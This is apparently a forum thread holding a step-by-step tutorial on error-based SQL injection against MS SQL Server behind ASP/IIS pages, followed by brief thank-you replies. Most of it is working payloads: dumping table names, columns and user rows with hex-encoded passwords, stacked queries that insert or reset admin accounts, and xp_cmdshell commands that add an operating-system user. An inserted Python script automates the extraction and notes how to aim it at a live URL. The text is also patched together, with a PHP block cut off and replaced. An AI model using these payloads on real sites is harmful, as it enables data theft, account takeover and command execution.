Tutorial Injection MsSQL - Complete
DISCLAIMER: THIS TUTORIAL IS SOLELY FOR EDUCATIONAL PURPOSES, FOR PROTECTING YOUR OWN CODE FROM SQL INJECTIONS. YOU TAKE FULL RESPONSIBILITY FOR ANY ACTION YOU DO AFTER READING THIS TUTORIAL.
Background
This article, entitled "Complete MsSQL Injection For Newbies", intends to provide the complete knowledge and know-how of SQL injection, specifically targeted at MsSQL (ASP+IIS, because that is where it occurs most frequently), except for the stacked query parts. First contribution over here...

0x00 The error output
The error output will be used only to cover the injection; building queries and things like that will not be described. To begin, I want to see whether we have found a bug; an error alone does not necessarily mean that there is an injection. To check, try to pull the version of MsSQL.

Target:
Code:
http://site.com/script.asp?id=5'
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Obtain the version:
Code:
5' or 1=@@version--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Code:
id=5' or 1=(select db_name())--
Code:
id=5' or 1=(select system_user)--
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'

The first method: using exclusion (with the names of the tables).
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table_name1','table_name2','table_name3','table_name4'))--
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+4+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--
Code:
5'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME>'table_name4')--

0x02 Data output
Suppose the Users table has the columns id (int), username (varchar) and password (binary). In order to display different types of data, we will have to use data type conversion (cast, convert, etc.). We pull the first entry in the id column:
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
Code:
5'+or+1=(select+top+1+cast(id+as+nvarchar)+from+Users+FOR+XML+PATH(''))--

Now let's take a cell from the password column. "cast(password as binary)" seemed to work well, but there are times when FOR XML PATH, cast or convert does not give the desired result. Then you can look for other functions, which have not yet been described anywhere. One of them follows ("..", the shorthand for accessing the system table, i.e. 'dbo'):
Code:
5'+or+1=(select+top+1+master..fn_varbintohexstr(password)+from+Users)--
Code:
5'+or+1=(SELECT+TOP+1+cast(id+as+nvarchar)%2B':'%2Bconvert(nvarchar,username)%2B':'%2Bmaster..fn_varbintohexstr(password)+FROM+Users)--
In response, we obtain:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
Code:
5'+or+1=(SELECT+TOP+1+quotename(id%2B':'%2Busername)+FROM+Users)--
Code:
5'+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=char(85)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115))--

Another plus of MsSQL + IIS is that very often we can "break off" a request with the ";" sign and then create a new one. Everything is done in much the same way.
Code:
5';+INSERT+INTO+Users+(id,username,password)+VALUES+(1,'admin','mypass')--
Code:
5';+UPDATE+Users+set+password='mypass'+where+username='admin'--

If you have enough rights, usually as the user "sa" (the equivalent of root in MySQL), you can try some of the following commands. How do you use them? Very simply: kill the request with a ";" and then create your own request:
Code:
5';exec master..xp_cmdshell 'dir c:\'--
Code:
5';exec master..xp_cmdshell 'net user admin password /add'--
Code:
5';exec master..xp_cmdshell [net user admin password /add]--

Theoretically, dumping the entire database via injection without knowledge of the database structure is impossible. But you can get the information in the following ways. First, parse it one request per record (I will post a parser later). Second, a function that parses through FOR XML RAW (about 2000 characters per request); I will post the script. Taken from pastebin.com
Code:
<?php
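
The one-request-per-record parser the post mentions, written out as an added example; it is not part of the original post or of the pastebin script. It builds the post's own payload shapes (NOT IN (SELECT TOP n ...) to step through INFORMATION_SCHEMA.TABLES, the char()-encoded table name for information_schema.columns, and the cast()/fn_varbintohexstr concatenation for rows) and reads each value back out of the '80040e07' conversion error, stopping when the page stops erroring. The base URL, the `id` parameter and the in-memory `fake_target` that stands in for the vulnerable ASP page are assumptions constructed here so the script runs offline; against a live page the `send` callable would be a real HTTP request.

```python
"""Error-based MSSQL extraction loop (added example, not the post's script):
one request per record, NOT IN (SELECT TOP n ...) to walk a set, and the
80040e07 conversion error to read each value back.  Target is simulated."""
import re
from typing import Callable, Dict, List, Optional
from urllib.parse import quote_plus

# Both wordings SQL Server uses when a string is compared to an int:
#   2000:  Syntax error converting the nvarchar value 'X' to a column of data type int.
#   2005+: Conversion failed when converting the nvarchar value 'X' to data type int.
CONVERSION_ERROR = re.compile(
    r"converting the n?varchar value '(.*?)' to (?:a column of )?data type int", re.S)


def leaked_value(body: str) -> Optional[str]:
    """Value MSSQL echoed inside the 80040e07 error page, or None if no error."""
    m = CONVERSION_ERROR.search(body)
    return m.group(1) if m else None


def sql_chars(s: str) -> str:
    """'Users' -> char(85)+char(115)+... so the payload needs no quote characters."""
    return "+".join(f"char({ord(c)})" for c in s)


def table_payload(n: int) -> str:
    """Leak the (n+1)-th table name by excluding the first n (the post's exclusion trick)."""
    return ("5' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES "
            f"WHERE TABLE_NAME NOT IN (SELECT TOP {n} TABLE_NAME "
            "FROM INFORMATION_SCHEMA.TABLES))--")


def column_payload(table: str, n: int) -> str:
    """Same exclusion walk over information_schema.columns for one table."""
    t = sql_chars(table)
    return ("5' or 1=(SELECT TOP 1 column_name FROM information_schema.columns "
            f"WHERE table_name={t} AND column_name NOT IN (SELECT TOP {n} column_name "
            f"FROM information_schema.columns WHERE table_name={t}))--")


def row_payload(table: str, n: int) -> str:
    """id:username:0xhex(password) for one row, skipping the first n ids."""
    return ("5' or 1=(SELECT TOP 1 cast(id as nvarchar)+':'+convert(nvarchar,username)"
            "+':'+master..fn_varbintohexstr(password) "
            f"FROM {table} WHERE id NOT IN (SELECT TOP {n} id FROM {table}))--")


def inject_url(base: str, payload: str) -> str:
    """URL-encode the payload: spaces become '+', a literal '+' becomes %2B."""
    return f"{base}?id={quote_plus(payload)}"   # 'id' parameter is an assumption


def walk(send: Callable[[str], str], make_payload: Callable[[int], str],
         limit: int = 50) -> List[str]:
    """One request per record; stop when the page stops throwing the error
    (the scalar subquery returned NULL, 1=NULL is not true, no conversion happens)."""
    out: List[str] = []
    for n in range(limit):
        value = leaked_value(send(make_payload(n)))
        if value is None:
            break
        out.append(value)
    return out


def dump(send: Callable[[str], str], table: str = "Users") -> Dict[str, List[str]]:
    """Tables, then the given table's columns, then its rows."""
    return {
        "tables": walk(send, table_payload),
        "columns": walk(send, lambda n: column_payload(table, n)),
        "rows": walk(send, lambda n: row_payload(table, n)),
    }


# --- constructed offline stand-in for the vulnerable ASP page (assumption) ---
FAKE_DB = {
    "tables": ["Users", "Orders", "News"],
    "columns": ["id", "username", "password"],
    "rows": ["1:admin:0x6d7970617373", "2:guest:0x677565737431"],
}
NORMAL_PAGE = "<html><body>Item 5</body></html>"
ERROR_PAGE = ("Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
              "Conversion failed when converting the nvarchar value '{}' "
              "to data type int.\n/script.asp, line 12")


def fake_target(payload: str) -> str:
    """Answers like an MSSQL-backed page: the value leaks in the conversion
    error while rows remain, otherwise the page renders normally."""
    if "INFORMATION_SCHEMA.TABLES" in payload:
        kind = "tables"
    elif "information_schema.columns" in payload:
        kind = "columns"
    else:
        kind = "rows"
    skip = int(re.findall(r"TOP (\d+)", payload)[-1])   # the inner TOP n
    values = FAKE_DB[kind]
    return ERROR_PAGE.format(values[skip]) if skip < len(values) else NORMAL_PAGE


if __name__ == "__main__":
    # Live use: send = lambda p: requests.get(inject_url("http://site.com/script.asp", p)).text
    for name, values in dump(fake_target).items():
        print(name, values)
```

The loop relies on the same two facts the post does: `SELECT TOP 1` on an exhausted set yields NULL rather than an error, which is the termination signal, and the error text quotes the offending string verbatim, so a single regex covering both the SQL Server 2000 and 2005+ wordings is the whole "parser". Column order from TOP without ORDER BY is whatever the engine returns, which is why the post's NOT IN exclusion is used instead of an offset.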
Old tutorial, bro,
but thanks anyway for your post. But I advise: if you do this by hand, this method makes you very tired, so sometimes you should use a tool like Panlogin or Havij.
I think you are wrong. I am sure. Let's discuss it. Write me a PM, we'll talk.
Nice tutorial for newbies.
Thanks.
Thanks, BRO, nice tutorial for newbies.
Thanks for sharing.
useful info
Nice tut, thanks a lot.
thank you
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.